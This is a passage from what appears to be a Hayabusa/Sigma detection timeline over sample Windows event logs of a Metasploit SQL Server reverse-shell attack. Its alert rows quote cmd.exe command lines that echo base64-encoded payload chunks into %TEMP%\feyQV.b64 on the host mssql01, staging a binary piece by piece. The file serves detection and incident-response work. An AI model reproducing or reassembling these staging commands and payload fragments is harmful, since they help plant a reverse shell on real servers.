Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.288 
+00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.560 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.562 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 
+00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.835 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.109 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.382 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.656 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLfgSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgV
W5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.929 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
//+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.203 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.476 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.750 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.023 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell 